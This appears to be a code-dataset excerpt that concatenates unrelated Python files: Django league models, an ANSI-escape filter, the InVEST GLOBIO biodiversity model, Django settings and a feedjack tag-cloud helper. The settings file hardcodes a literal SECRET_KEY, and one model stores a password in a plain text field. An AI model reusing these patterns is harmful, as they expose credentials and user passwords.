)
equipeExt = models.ForeignKey(
Equipe,
related_name='rencontreExt',
verbose_name='Equipe Exterieur'
)
scoreDom = models.IntegerField(
verbose_name='Score Domicile',
null=True,
blank=True
)
scoreExt = models.IntegerField(
verbose_name='Score Exterieur',
null=True,
blank=True
)
forfaitDom = models.BooleanField(
verbose_name='Forfait Domicile',
default=False
)
forfaitExt = models.BooleanField(
verbose_name='Forfait Exterieur',
default=False
)
def __str__(self):
return str(self.numero)
class Profil(models.Model):
user = models.OneToOneField(User, verbose_name='Utilisateur')
equipes = models.ManyToManyField(Equipe)
def __str__(self):
return self.user.username
class SiteConfiguration(SingletonModel):
login = models.CharField(max_length=7, verbose_name='Identifiant')
password = models.CharField(max_length=8, verbose_name='Mot de passe')
username = models.CharField(max_length=20, verbose_name='Nom utilisateur')
class Meta:
verbose_name = "Site Configuration"
| StarcoderdataPython |
3397516 | <reponame>coveooss/coveo-python-oss<filename>coveo-systools/coveo_systools/streams.py
import re
# 7-bit and 8-bit C1 ANSI sequences (note: this is a bytes regex, not str)
# We use this to filter out ANSI codes from console outputs
# Source: https://stackoverflow.com/a/14693789/1741414
ANSI_ESCAPE_8BIT = re.compile(
br"""
(?: # either 7-bit C1, two bytes, ESC Fe (omitting CSI)
\x1B
[@-Z\\-_]
| # or a single 8-bit byte Fe (omitting CSI)
[\x80-\x9A\x9C-\x9F]
| # or CSI + control codes
(?: # 7-bit CSI, ESC [
\x1B\[
| # 8-bit CSI, 9B
\x9B
)
[0-?]* # Parameter bytes
[ -/]* # Intermediate bytes
[@-~] # Final byte
)
""",
re.VERBOSE,
)
def filter_ansi(stream: bytes) -> bytes:
"""Removes ANSI sequences from a stream."""
return bytes(ANSI_ESCAPE_8BIT.sub(b"", stream))
| StarcoderdataPython |
3254737 | <reponame>hkotaro1215/invest
"""GLOBIO InVEST Model."""
from __future__ import absolute_import
import os
import logging
import collections
import csv
import uuid
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
import numpy
import natcap.invest.pygeoprocessing_0_3_3
from . import utils
from . import validation
LOGGER = logging.getLogger('natcap.invest.globio')
# this value of sigma == 9.0 was derived by <NAME> as a good
# approximation to use as a gaussian filter to replace the connectivity index.
# I don't have any other documentation than his original code base.
SIGMA = 9.0
def execute(args):
"""GLOBIO.
The model operates in two modes. Mode (a) generates a landcover map
based on a base landcover map and information about crop yields,
infrastructure, and more. Mode (b) assumes the globio landcover
map is generated. These modes are used below to describe input
parameters.
Parameters:
args['workspace_dir'] (string): output directory for intermediate,
temporary, and final files
args['predefined_globio'] (boolean): if True then "mode (b)" else
"mode (a)"
args['results_suffix'] (string): (optional) string to append to any
output files
args['lulc_uri'] (string): used in "mode (a)" path to a base landcover
map with integer codes
args['lulc_to_globio_table_uri'] (string): used in "mode (a)" path to
table that translates the land-cover args['lulc_uri'] to
intermediate GLOBIO classes, from which they will be further
differentiated using the additional data in the model. Contains
at least the following fields:
* 'lucode': Land use and land cover class code of the dataset
used. LULC codes match the 'values' column in the LULC
raster of mode (b) and must be numeric and unique.
* 'globio_lucode': The LULC code corresponding to the GLOBIO class
to which it should be converted, using intermediate codes
described in the example below.
args['infrastructure_dir'] (string): used in "mode (a) and (b)" a path
to a folder containing maps of either gdal compatible rasters or
OGR compatible shapefiles. These data will be used in the
infrastructure to calculation of MSA.
args['pasture_uri'] (string): used in "mode (a)" path to pasture raster
args['potential_vegetation_uri'] (string): used in "mode (a)" path to
potential vegetation raster
args['pasture_threshold'] (float): used in "mode (a)"
args['intensification_fraction'] (float): used in "mode (a)"; a value
between 0 and 1 denoting proportion of total agriculture that
should be classified as 'high input'
args['primary_threshold'] (float): used in "mode (a)"
args['msa_parameters_uri'] (string): path to MSA classification
parameters
args['aoi_uri'] (string): (optional) if it exists then final MSA raster
is summarized by AOI
args['globio_lulc_uri'] (string): used in "mode (b)" path to predefined
globio raster.
Returns:
None
"""
msa_parameter_table = load_msa_parameter_table(
args['msa_parameters_uri'], float(args['intensification_fraction']))
file_suffix = utils.make_suffix_string(args, 'results_suffix')
output_dir = os.path.join(args['workspace_dir'])
intermediate_dir = os.path.join(
args['workspace_dir'], 'intermediate_outputs')
tmp_dir = os.path.join(args['workspace_dir'], 'tmp')
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.create_directories(
[output_dir, intermediate_dir, tmp_dir])
# cell size should be based on the landcover map
if not args['predefined_globio']:
out_pixel_size = natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_cell_size_from_uri(
args['lulc_uri'])
globio_lulc_uri = _calculate_globio_lulc_map(
args['lulc_to_globio_table_uri'], args['lulc_uri'],
args['potential_vegetation_uri'], args['pasture_uri'],
float(args['pasture_threshold']), float(args['primary_threshold']),
file_suffix, intermediate_dir, tmp_dir, out_pixel_size)
else:
out_pixel_size = natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_cell_size_from_uri(
args['globio_lulc_uri'])
LOGGER.info('no need to calculate GLOBIO LULC because it is passed in')
globio_lulc_uri = args['globio_lulc_uri']
globio_nodata = natcap.invest.pygeoprocessing_0_3_3.get_nodata_from_uri(globio_lulc_uri)
infrastructure_uri = os.path.join(
intermediate_dir, 'combined_infrastructure%s.tif' % file_suffix)
_collapse_infrastructure_layers(
args['infrastructure_dir'], globio_lulc_uri, infrastructure_uri)
# calc_msa_f
primary_veg_mask_uri = os.path.join(
tmp_dir, 'primary_veg_mask%s.tif' % file_suffix)
primary_veg_mask_nodata = -1
def _primary_veg_mask_op(lulc_array):
"""Masking out natural areas."""
nodata_mask = lulc_array == globio_nodata
# landcover type 1 in the GLOBIO schema represents primary vegetation
result = (lulc_array == 1)
return numpy.where(nodata_mask, primary_veg_mask_nodata, result)
LOGGER.info("create mask of primary veg areas")
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[globio_lulc_uri], _primary_veg_mask_op,
primary_veg_mask_uri, gdal.GDT_Int32, primary_veg_mask_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
vectorize_op=False)
LOGGER.info('gaussian filter primary veg')
gaussian_kernel_uri = os.path.join(
tmp_dir, 'gaussian_kernel%s.tif' % file_suffix)
make_gaussian_kernel_uri(SIGMA, gaussian_kernel_uri)
smoothed_primary_veg_mask_uri = os.path.join(
tmp_dir, 'smoothed_primary_veg_mask%s.tif' % file_suffix)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.convolve_2d_uri(
primary_veg_mask_uri, gaussian_kernel_uri,
smoothed_primary_veg_mask_uri)
primary_veg_smooth_uri = os.path.join(
intermediate_dir, 'primary_veg_smooth%s.tif' % file_suffix)
def _primary_veg_smooth_op(
primary_veg_mask_array, smoothed_primary_veg_mask):
"""Mask out ffqi only where there's an ffqi."""
return numpy.where(
primary_veg_mask_array != primary_veg_mask_nodata,
primary_veg_mask_array * smoothed_primary_veg_mask,
primary_veg_mask_nodata)
LOGGER.info('calculate primary_veg_smooth')
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[primary_veg_mask_uri, smoothed_primary_veg_mask_uri],
_primary_veg_smooth_op, primary_veg_smooth_uri, gdal.GDT_Float32,
primary_veg_mask_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, vectorize_op=False)
msa_nodata = -1
msa_f_table = msa_parameter_table['msa_f']
msa_f_values = sorted(msa_f_table)
def _msa_f_op(primary_veg_smooth):
"""Calculate msa fragmentation."""
nodata_mask = primary_veg_mask_nodata == primary_veg_smooth
msa_f = numpy.empty(primary_veg_smooth.shape)
for value in reversed(msa_f_values):
# special case if it's a > or < value
if value == '>':
msa_f[primary_veg_smooth > msa_f_table['>'][0]] = (
msa_f_table['>'][1])
elif value == '<':
continue
else:
msa_f[primary_veg_smooth <= value] = msa_f_table[value]
if '<' in msa_f_table:
msa_f[primary_veg_smooth < msa_f_table['<'][0]] = (
msa_f_table['<'][1])
msa_f[nodata_mask] = msa_nodata
return msa_f
LOGGER.info('calculate msa_f')
msa_f_uri = os.path.join(output_dir, 'msa_f%s.tif' % file_suffix)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[primary_veg_smooth_uri], _msa_f_op, msa_f_uri, gdal.GDT_Float32,
msa_nodata, out_pixel_size, "intersection", dataset_to_align_index=0,
vectorize_op=False)
# calc_msa_i
msa_f_values = sorted(msa_f_table)
msa_i_other_table = msa_parameter_table['msa_i_other']
msa_i_primary_table = msa_parameter_table['msa_i_primary']
msa_i_other_values = sorted(msa_i_other_table)
msa_i_primary_values = sorted(msa_i_primary_table)
def _msa_i_op(lulc_array, distance_to_infrastructure):
"""Calculate msa infrastructure."""
distance_to_infrastructure *= out_pixel_size # convert to meters
msa_i_primary = numpy.empty(lulc_array.shape)
msa_i_other = numpy.empty(lulc_array.shape)
for value in reversed(msa_i_primary_values):
# special case if it's a > or < value
if value == '>':
msa_i_primary[distance_to_infrastructure >
msa_i_primary_table['>'][0]] = (
msa_i_primary_table['>'][1])
elif value == '<':
continue
else:
msa_i_primary[distance_to_infrastructure <= value] = (
msa_i_primary_table[value])
if '<' in msa_i_primary_table:
msa_i_primary[distance_to_infrastructure <
msa_i_primary_table['<'][0]] = (
msa_i_primary_table['<'][1])
for value in reversed(msa_i_other_values):
# special case if it's a > or < value
if value == '>':
msa_i_other[distance_to_infrastructure >
msa_i_other_table['>'][0]] = (
msa_i_other_table['>'][1])
elif value == '<':
continue
else:
msa_i_other[distance_to_infrastructure <= value] = (
msa_i_other_table[value])
if '<' in msa_i_other_table:
msa_i_other[distance_to_infrastructure <
msa_i_other_table['<'][0]] = (
msa_i_other_table['<'][1])
msa_i = numpy.where(lulc_array == 1, msa_i_primary, msa_i_other)
return msa_i
LOGGER.info('calculate msa_i')
distance_to_infrastructure_uri = os.path.join(
intermediate_dir, 'distance_to_infrastructure%s.tif' % file_suffix)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.distance_transform_edt(
infrastructure_uri, distance_to_infrastructure_uri)
msa_i_uri = os.path.join(output_dir, 'msa_i%s.tif' % file_suffix)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[globio_lulc_uri, distance_to_infrastructure_uri], _msa_i_op,
msa_i_uri, gdal.GDT_Float32, msa_nodata, out_pixel_size,
"intersection", dataset_to_align_index=0, vectorize_op=False)
# calc_msa_lu
msa_lu_uri = os.path.join(
output_dir, 'msa_lu%s.tif' % file_suffix)
LOGGER.info('calculate msa_lu')
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.reclassify_dataset_uri(
globio_lulc_uri, msa_parameter_table['msa_lu'], msa_lu_uri,
gdal.GDT_Float32, globio_nodata, exception_flag='values_required')
LOGGER.info('calculate msa')
msa_uri = os.path.join(
output_dir, 'msa%s.tif' % file_suffix)
def _msa_op(msa_f, msa_lu, msa_i):
"""Calculate the MSA which is the product of the sub MSAs."""
return numpy.where(
msa_f != globio_nodata, msa_f * msa_lu * msa_i, globio_nodata)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[msa_f_uri, msa_lu_uri, msa_i_uri], _msa_op, msa_uri,
gdal.GDT_Float32, msa_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, vectorize_op=False)
# ensure that aoi_uri is defined and it's not an empty string
if 'aoi_uri' in args and len(args['aoi_uri']) > 0:
# copy the aoi to an output shapefile
original_datasource = gdal.OpenEx(args['aoi_uri'], gdal.OF_VECTOR)
summary_aoi_uri = os.path.join(
output_dir, 'aoi_summary%s.shp' % file_suffix)
# Delete if existing shapefile with the same name
if os.path.isfile(summary_aoi_uri):
os.remove(summary_aoi_uri)
# Copy the input shapefile into the designated output folder
driver = gdal.GetDriverByName('ESRI Shapefile')
datasource_copy = driver.CreateCopy(
summary_aoi_uri, original_datasource)
layer = datasource_copy.GetLayer()
msa_summary_field_def = ogr.FieldDefn('msa_mean', ogr.OFTReal)
msa_summary_field_def.SetWidth(24)
msa_summary_field_def.SetPrecision(11)
layer.CreateField(msa_summary_field_def)
# make an identifying id per polygon that can be used for aggregation
layer_defn = layer.GetLayerDefn()
while True:
# last 8 characters because shapefile fields are limited to 8
poly_id_field = str(uuid.uuid4())[-8:]
if layer_defn.GetFieldIndex(poly_id_field) == -1:
break
layer_id_field = ogr.FieldDefn(poly_id_field, ogr.OFTInteger)
layer.CreateField(layer_id_field)
for poly_index, poly_feat in enumerate(layer):
poly_feat.SetField(poly_id_field, poly_index)
layer.SetFeature(poly_feat)
layer.SyncToDisk()
# aggregate by ID
msa_summary = natcap.invest.pygeoprocessing_0_3_3.aggregate_raster_values_uri(
msa_uri, summary_aoi_uri, shapefile_field=poly_id_field)
# add new column to output file
for feature_id in xrange(layer.GetFeatureCount()):
feature = layer.GetFeature(feature_id)
key_value = feature.GetFieldAsInteger(poly_id_field)
feature.SetField(
'msa_mean', float(msa_summary.pixel_mean[key_value]))
layer.SetFeature(feature)
# don't need a random poly id anymore
layer.DeleteField(layer_defn.GetFieldIndex(poly_id_field))
for root_dir, _, files in os.walk(tmp_dir):
for filename in files:
try:
os.remove(os.path.join(root_dir, filename))
except OSError:
LOGGER.warn("couldn't remove temporary file %s", filename)
def make_gaussian_kernel_uri(sigma, kernel_uri):
"""Create a gaussian kernel raster."""
max_distance = sigma * 5
kernel_size = int(numpy.round(max_distance * 2 + 1))
driver = gdal.GetDriverByName('GTiff')
kernel_dataset = driver.Create(
kernel_uri.encode('utf-8'), kernel_size, kernel_size, 1,
gdal.GDT_Float32, options=['BIGTIFF=IF_SAFER'])
# Make some kind of geotransform, it doesn't matter what but
# will make GIS libraries behave better if it's all defined
kernel_dataset.SetGeoTransform([444720, 30, 0, 3751320, 0, -30])
srs = osr.SpatialReference()
srs.SetUTM(11, 1)
srs.SetWellKnownGeogCS('NAD27')
kernel_dataset.SetProjection(srs.ExportToWkt())
kernel_band = kernel_dataset.GetRasterBand(1)
kernel_band.SetNoDataValue(-9999)
col_index = numpy.array(xrange(kernel_size))
integration = 0.0
for row_index in xrange(kernel_size):
kernel = numpy.exp(
-((row_index - max_distance)**2 +
(col_index - max_distance) ** 2)/(2.0*sigma**2)).reshape(
1, kernel_size)
integration += numpy.sum(kernel)
kernel_band.WriteArray(kernel, xoff=0, yoff=row_index)
for row_index in xrange(kernel_size):
kernel_row = kernel_band.ReadAsArray(
xoff=0, yoff=row_index, win_xsize=kernel_size, win_ysize=1)
kernel_row /= integration
kernel_band.WriteArray(kernel_row, 0, row_index)
def load_msa_parameter_table(
msa_parameter_table_filename, intensification_fraction):
"""Load parameter table to a dict that to define the MSA ranges.
Parameters:
msa_parameter_table_filename (string): path to msa csv table
intensification_fraction (float): a number between 0 and 1 indicating
what level between msa_lu 8 and 9 to define the general GLOBIO
code "12" to.
returns a dictionary of the form
{
'msa_f': {
valuea: msa_f_value, ...
valueb: ...
'<': (bound, msa_f_value),
'>': (bound, msa_f_value)}
'msa_i_other_table': {
valuea: msa_i_value, ...
valueb: ...
'<': (bound, msa_i_other_value),
'>': (bound, msa_i_other_value)}
'msa_i_primary': {
valuea: msa_i_primary_value, ...
valueb: ...
'<': (bound, msa_i_primary_value),
'>': (bound, msa_i_primary_value)}
'msa_lu': {
valuea: msa_lu_value, ...
valueb: ...
'<': (bound, msa_lu_value),
'>': (bound, msa_lu_value)
12: (msa_lu_8 * (1.0 - intensification_fraction) +
msa_lu_9 * intensification_fraction}
}
"""
with open(msa_parameter_table_filename, 'rb') as msa_parameter_table_file:
reader = csv.DictReader(msa_parameter_table_file)
msa_dict = collections.defaultdict(dict)
for line in reader:
if line['Value'][0] in ['<', '>']:
# put the limit and the MSA value in a tub
value = line['Value'][0]
msa_dict[line['MSA_type']][value] = (
float(line['Value'][1:]), float(line['MSA_x']))
continue
elif '-' in line['Value']:
value = float(line['Value'].split('-')[1])
else:
value = float(line['Value'])
msa_dict[line['MSA_type']][value] = float(line['MSA_x'])
# cast back to a regular dict so we get keyerrors on non-existant keys
msa_dict['msa_lu'][12] = (
msa_dict['msa_lu'][8] * (1.0 - intensification_fraction) +
msa_dict['msa_lu'][9] * intensification_fraction)
return dict(msa_dict)
def _calculate_globio_lulc_map(
lulc_to_globio_table_uri, lulc_uri, potential_vegetation_uri,
pasture_uri, pasture_threshold, primary_threshold, file_suffix,
intermediate_dir, tmp_dir, out_pixel_size):
"""Translate a general landcover map into a GLOBIO version.
Parameters:
lulc_to_globio_table_uri (string): a table that maps arbitrary
landcover values to globio equivalents.
lulc_uri (string): path to the raw landcover map.
potential_vegetation_uri (string): a landcover map that indicates what
the vegetation types would be if left to revert to natural state
pasture_uri (string): a path to a raster that indicates the percent
of pasture contained in the pixel. used to classify forest types
from scrubland.
pasture_threshold (float): the threshold to classify pixels in pasture
as potential forest or scrub
primary_threshold (float): the threshold to classify the calculated
FFQI pixels into core forest or secondary
file_suffix - (string) to append on output file
intermediate_dir - (string) path to location for temporary files of
which the following files are created
'intermediate_globio_lulc.tif': reclassified landcover map to
globio landcover codes
'ffqi.tif': index of fragmentation due to infrastructure and
original values of landscape
'globio_lulc.tif': primary output of the function, starts
with intermeidate globio and modifies based on the other
biophysical parameters to the function as described in the
GLOBIO process
tmp_dir - (string) path to location for temporary files
out_pixel_size - (float) pixel size of output globio map
Returns:
a (string) filename to the generated globio GeoTIFF map
"""
lulc_to_globio_table = natcap.invest.pygeoprocessing_0_3_3.get_lookup_from_table(
lulc_to_globio_table_uri, 'lucode')
lulc_to_globio = dict(
[(lulc_code, int(table['globio_lucode'])) for
(lulc_code, table) in lulc_to_globio_table.items()])
intermediate_globio_lulc_uri = os.path.join(
tmp_dir, 'intermediate_globio_lulc%s.tif' % file_suffix)
globio_nodata = -1
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.reclassify_dataset_uri(
lulc_uri, lulc_to_globio, intermediate_globio_lulc_uri,
gdal.GDT_Int32, globio_nodata, exception_flag='values_required')
globio_lulc_uri = os.path.join(
intermediate_dir, 'globio_lulc%s.tif' % file_suffix)
# smoothed natural areas are natural areas run through a gaussian filter
forest_areas_uri = os.path.join(
tmp_dir, 'forest_areas%s.tif' % file_suffix)
forest_areas_nodata = -1
def _forest_area_mask_op(lulc_array):
"""Masking out forest areas."""
nodata_mask = lulc_array == globio_nodata
# landcover code 130 represents all MODIS forest codes which originate
# as 1-5
result = (lulc_array == 130)
return numpy.where(nodata_mask, forest_areas_nodata, result)
LOGGER.info("create mask of natural areas")
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[intermediate_globio_lulc_uri], _forest_area_mask_op,
forest_areas_uri, gdal.GDT_Int32, forest_areas_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
vectorize_op=False)
LOGGER.info('gaussian filter natural areas')
gaussian_kernel_uri = os.path.join(
tmp_dir, 'gaussian_kernel%s.tif' % file_suffix)
make_gaussian_kernel_uri(SIGMA, gaussian_kernel_uri)
smoothed_forest_areas_uri = os.path.join(
tmp_dir, 'smoothed_forest_areas%s.tif' % file_suffix)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.convolve_2d_uri(
forest_areas_uri, gaussian_kernel_uri, smoothed_forest_areas_uri)
ffqi_uri = os.path.join(
intermediate_dir, 'ffqi%s.tif' % file_suffix)
def _ffqi_op(forest_areas_array, smoothed_forest_areas):
"""Mask out ffqi only where there's an ffqi."""
return numpy.where(
forest_areas_array != forest_areas_nodata,
forest_areas_array * smoothed_forest_areas,
forest_areas_nodata)
LOGGER.info('calculate ffqi')
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[forest_areas_uri, smoothed_forest_areas_uri], _ffqi_op,
ffqi_uri, gdal.GDT_Float32, forest_areas_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
vectorize_op=False)
# remap globio lulc to an internal lulc based on ag and intensification
# proportion these came from the 'expansion_scenarios.py'
def _create_globio_lulc(
lulc_array, potential_vegetation_array, pasture_array,
ffqi):
"""Construct GLOBIO lulc given relevant biophysical parameters."""
# Step 1.2b: Assign high/low according to threshold based on yieldgap.
nodata_mask = lulc_array == globio_nodata
# Step 1.2c: Classify all ag classes as a new LULC value "12" per our
# custom design of agriculture
# landcover 132 represents agriculture landcover types in the GLOBIO
# classification scheme
lulc_ag_split = numpy.where(
lulc_array == 132, 12, lulc_array)
nodata_mask = nodata_mask | (lulc_array == globio_nodata)
# Step 1.3a: Split Scrublands and grasslands into pristine
# vegetations, livestock grazing areas, and man-made pastures.
# landcover 131 represents grassland/shrubland in the GLOBIO
# classification
three_types_of_scrubland = numpy.where(
(potential_vegetation_array <= 8) & (lulc_ag_split == 131), 6.0,
5.0)
three_types_of_scrubland = numpy.where(
(three_types_of_scrubland == 5.0) &
(pasture_array < pasture_threshold), 1.0,
three_types_of_scrubland)
# Step 1.3b: Stamp ag_split classes onto input LULC
# landcover 131 represents grassland/shrubland in the GLOBIO
# classification
broad_lulc_shrub_split = numpy.where(
lulc_ag_split == 131, three_types_of_scrubland, lulc_ag_split)
# Step 1.4a: Split Forests into Primary, Secondary
four_types_of_forest = numpy.empty(lulc_array.shape)
# 1 is primary forest
four_types_of_forest[(ffqi >= primary_threshold)] = 1
# 3 is secondary forest
four_types_of_forest[(ffqi < primary_threshold)] = 3
# Step 1.4b: Stamp ag_split classes onto input LULC
# landcover code 130 represents all MODIS forest codes which originate
# as 1-5
globio_lulc = numpy.where(
broad_lulc_shrub_split == 130, four_types_of_forest,
broad_lulc_shrub_split) # stamp primary vegetation
return numpy.where(nodata_mask, globio_nodata, globio_lulc)
LOGGER.info('create the globio lulc')
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
[intermediate_globio_lulc_uri, potential_vegetation_uri, pasture_uri,
ffqi_uri], _create_globio_lulc, globio_lulc_uri, gdal.GDT_Int32,
globio_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, vectorize_op=False)
return globio_lulc_uri
def _collapse_infrastructure_layers(
infrastructure_dir, base_raster_uri, infrastructure_uri):
"""Collapse all GIS infrastructure layers to one raster.
Gathers all the GIS layers in the given directory and collapses them
to a single byte raster mask where 1 indicates a pixel overlapping with
one of the original infrastructure layers, 0 does not, and nodata
indicates a region that has no layers that overlap but are still contained
in the bounding box.
Parameters:
infrastructure_dir (string): path to a directory containing maps of
either gdal compatible rasters or OGR compatible shapefiles.
base_raster_uri (string): a path to a file that has the dimensions and
projection of the desired output infrastructure file.
infrastructure_uri (string): (output) path to a file that will be a
byte raster with 1s everywhere there was a GIS layer present in
the GIS layers in `infrastructure_dir`.
Returns:
None
"""
# load the infrastructure layers from disk
infrastructure_filenames = []
infrastructure_nodata_list = []
infrastructure_tmp_filenames = []
for root_directory, _, filename_list in os.walk(infrastructure_dir):
for filename in filename_list:
if filename.lower().endswith(".tif"):
infrastructure_filenames.append(
os.path.join(root_directory, filename))
infrastructure_nodata_list.append(
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_nodata_from_uri(
infrastructure_filenames[-1]))
if filename.lower().endswith(".shp"):
infrastructure_tmp_raster = (
natcap.invest.pygeoprocessing_0_3_3.temporary_filename())
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.new_raster_from_base_uri(
base_raster_uri, infrastructure_tmp_raster,
'GTiff', -1.0, gdal.GDT_Int32, fill_value=0)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.rasterize_layer_uri(
infrastructure_tmp_raster,
os.path.join(root_directory, filename), burn_values=[1],
option_list=["ALL_TOUCHED=TRUE"])
infrastructure_filenames.append(infrastructure_tmp_raster)
infrastructure_tmp_filenames.append(infrastructure_tmp_raster)
infrastructure_nodata_list.append(
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_nodata_from_uri(
infrastructure_filenames[-1]))
if len(infrastructure_filenames) == 0:
raise ValueError(
"infrastructure directory didn't have any GeoTIFFS or "
"Shapefiles at %s", infrastructure_dir)
infrastructure_nodata = -1
def _collapse_infrastructure_op(*infrastructure_array_list):
"""For each pixel, create mask 1 if all valid, else set to nodata."""
nodata_mask = (
infrastructure_array_list[0] == infrastructure_nodata_list[0])
infrastructure_result = infrastructure_array_list[0] > 0
for index in range(1, len(infrastructure_array_list)):
current_nodata = (
infrastructure_array_list[index] ==
infrastructure_nodata_list[index])
infrastructure_result = (
infrastructure_result |
((infrastructure_array_list[index] > 0) & ~current_nodata))
nodata_mask = (
nodata_mask & current_nodata)
return numpy.where(
nodata_mask, infrastructure_nodata, infrastructure_result)
LOGGER.info('collapse infrastructure into one raster')
out_pixel_size = natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_cell_size_from_uri(
base_raster_uri)
natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
infrastructure_filenames, _collapse_infrastructure_op,
infrastructure_uri, gdal.GDT_Byte, infrastructure_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
vectorize_op=False)
# clean up the temporary filenames
for filename in infrastructure_tmp_filenames:
os.remove(filename)
@validation.invest_validator
def validate(args, limit_to=None):
"""Validate args to ensure they conform to `execute`'s contract.
Parameters:
args (dict): dictionary of key(str)/value pairs where keys and
values are specified in `execute` docstring.
limit_to (str): (optional) if not None indicates that validation
should only occur on the args[limit_to] value. The intent that
individual key validation could be significantly less expensive
than validating the entire `args` dictionary.
Returns:
list of ([invalid key_a, invalid_keyb, ...], 'warning/error message')
tuples. Where an entry indicates that the invalid keys caused
the error message in the second part of the tuple. This should
be an empty list if validation succeeds.
"""
missing_key_list = []
no_value_list = []
validation_error_list = []
required_keys = [
'workspace_dir',
'aoi_uri',
'infrastructure_dir',
'intensification_fraction',
'msa_parameters_uri']
if 'predefined_globio' in args:
if args['predefined_globio']:
required_keys.append('globio_lulc_uri')
else:
required_keys.extend([
'lulc_to_globio_table_uri',
'lulc_uri',
'pasture_uri',
'potential_vegetation_uri',
'primary_threshold',
'pasture_threshold'])
for key in required_keys:
if limit_to is None or limit_to == key:
if key not in args:
missing_key_list.append(key)
elif args[key] in ['', None]:
no_value_list.append(key)
if len(missing_key_list) > 0:
# if there are missing keys, we have raise KeyError to stop hard
raise KeyError(
"The following keys were expected in `args` but were missing " +
', '.join(missing_key_list))
if len(no_value_list) > 0:
validation_error_list.append(
(no_value_list, 'parameter has no value'))
file_type_list = [
('aoi_uri', 'vector'),
('infrastructure_dir', 'directory'),
('msa_parameters_uri', 'table'),
('globio_lulc_uri', 'raster'),
('lulc_to_globio_table_uri', 'table'),
('lulc_uri', 'raster'),
('pasture_uri', 'raster'),
('potential_vegetation_uri', 'raster')]
# check that existing/optional files are the correct types
with utils.capture_gdal_logging():
for key, key_type in file_type_list:
if (limit_to in [None, key]) and key in required_keys:
if not os.path.exists(args[key]):
validation_error_list.append(
([key], 'not found on disk'))
continue
if key_type == 'raster':
raster = gdal.OpenEx(args[key])
if raster is None:
validation_error_list.append(
([key], 'not a raster'))
del raster
elif key_type == 'vector':
vector = gdal.OpenEx(args[key])
if vector is None:
validation_error_list.append(
([key], 'not a vector'))
del vector
return validation_error_list
| StarcoderdataPython |
1659152 | import os
PROJECT_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
SECRET_KEY = "pm=6+$d7--sl1rpmu7x*(72(=le!4lp-v-8tv993(+$7ak((&x"
MANAGERS = ADMINS = []
SITE_ID = 1
USE_I18N = True
USE_L10N = True
TIME_ZONE = "America/Chicago"
LANGUAGE_CODE = "en-us"
# These are for user-uploaded content.
MEDIA_ROOT = os.path.join(PROJECT_ROOT, "site_media")
MEDIA_URL = "/media/"
# These are for site static media (e.g. CSS and JS)
# This one is where static content is collected to.
STATIC_ROOT = os.path.join(PROJECT_ROOT, "static_root")
STATIC_URL = "/static/"
ADMIN_MEDIA_PREFIX = "/static/admin/"
STATICFILES_DIRS = [
os.path.join(PROJECT_ROOT, "static"),
]
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# Template stuff
TEMPLATE_LOADERS = [
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
]
TEMPLATE_CONTEXT_PROCESSORS = [
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
]
TEMPLATE_DIRS = [
os.path.join(PROJECT_ROOT, "templates"),
]
ROOT_URLCONF = "tracebin_server.urls"
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"handlers": {
"mail_admins": {
"level": "ERROR",
"class": "django.utils.log.AdminEmailHandler",
},
},
"loggers": {
"django.request": {
"handlers": ["mail_admins"],
"level": "ERROR",
"propagate": True,
},
},
}
INSTALLED_APPS = [
"django.contrib.sessions",
"django.contrib.staticfiles",
"django.contrib.messages",
"django.contrib.auth",
"django.contrib.contenttypes",
"tracebin_server.traces",
]
| StarcoderdataPython |
168403 | # -*- coding: utf-8 -*-
"""
feedjack
<NAME>
fjcloud.py
"""
import math
from feedjack import fjlib
from feedjack import fjcache
def getsteps(levels, tagmax):
""" Returns a list with the max number of posts per "tagcloud level"
"""
ntw = levels
if ntw < 2:
ntw = 2
steps = [(stp, 1 + (stp * int(math.ceil(tagmax * 1.0 / ntw - 1))))
for stp in range(ntw)]
# just to be sure~
steps[-1] = (steps[-1][0], tagmax+1)
return steps
def build(site, tagdata):
""" Returns the tag cloud for a list of tags.
"""
tagdata.sort()
# we get the most popular tag to calculate the tags' weigth
tagmax = 0
for tagname, tagcount in tagdata:
if tagcount > tagmax:
tagmax = tagcount
steps = getsteps(site.tagcloud_levels, tagmax)
tags = []
for tagname, tagcount in tagdata:
weight = [twt[0] \
for twt in steps if twt[1] >= tagcount and twt[1] > 0][0]+1
